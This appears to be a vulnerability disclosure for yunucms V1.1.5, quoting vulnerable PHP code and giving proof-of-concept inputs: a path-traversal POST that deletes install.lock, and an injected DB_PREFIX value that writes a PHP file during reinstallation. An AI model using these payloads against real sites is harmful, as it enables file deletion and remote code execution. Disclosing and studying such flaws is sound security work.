Description
Two issue was discovered in yunucms V1.1.5。
1、Arbitrary File Deletion
2、Launch a new installation process to execute PHP code
1、There is a Arbitrary File Deletion attacks vulnerability which allows remote attackers to unlink any file
The code section which made this vulnerability possible is found in the /statics/ueditor/php/vendor/Local.class.php file:
line 34-68
public function remove(){
$file = trim($_POST['key']);
$config = $this->config;
$root_path = $config['root_path'];
//安全验证
$pathlist = explode("/", $file);
if ($pathlist[0] != 'uploads' && $pathlist[1] != 'uploads') {
return array(
'state' => 'ERROR',
'error' => 'Folders start from uploads'
);
exit();
}
$file_path = $root_path.$file;
if( file_exists($file_path) ){
$result = @unlink($file_path);
if( $result ){
return array(
'state' => 'SUCCESS'
);
}else{
return array(
'state' => 'ERROR',
'error' => 'delete file error'
);
}
}
return array(
'state' => 'ERROR',
'error' => 'file not exists'
);
}In the remove() function shown above, the content of $_POST['key'] gets used in the call to unlink() without undergoing any authentication or sanitization.
POC
url:/statics/ueditor/php/controller.php?action=remove
POST: key=/uploads/../data/install.lock
/data/install.lock has been removed.
2、Launch a new installation process to execute PHP code
After remove /data/install.lock ,remote attackers can Launch a new installation process.
The code section which made this vulnerability possible is found in the /statics/app/index/controller/Install.php file:
line 117-131
//修改数据库文件
$coffile = CONF_PATH.DS.'database.php';
Config::load($coffile, '', 'database');
$conflist = Config::get('','database');
$param = array(
'hostname' => $data['DB_HOST'],
'hostport' => $data['DB_PORT'],
'database' => $data['DB_NAME'],
'username' => $data['DB_USER'],
'password' => $data['DB_PWD'],
'prefix' => $data['DB_PREFIX']
);
setConfigfile($coffile, array_merge($conflist, $param));
$showstr .= show_msg('配置数据库信息完成...');Follow function setConfigfile(),in /app/admin/common.php file:
line 76-87
//写入配置文件
function setConfigfile($file, $arr){
$str="<?php \nreturn [\n";
foreach($arr as $key=>$v){
/*$v = htmlspecialchars_decode($v);
$v = htmlspecialchars($v);*/
$str.= "\t'".$key."'=>'".$v."',\n";
}
$str.="];\n";
file_put_contents($file, $str);
}Use file_put_contents to wirte $arr into $file(config\database.php)
POC
In installation process setup2 ,we can input yunu_',].die(file_put_contents('uploads\image\f4ck.php','<?=phpinfo();?>'));$a=['a'=>' to 数据表前缀 DB_PREFIX

When finish installation process,we can get /data/database.php like this:

Visit homepage http://127.0.0.1:81,will create file /uploads/image/f4ck.php

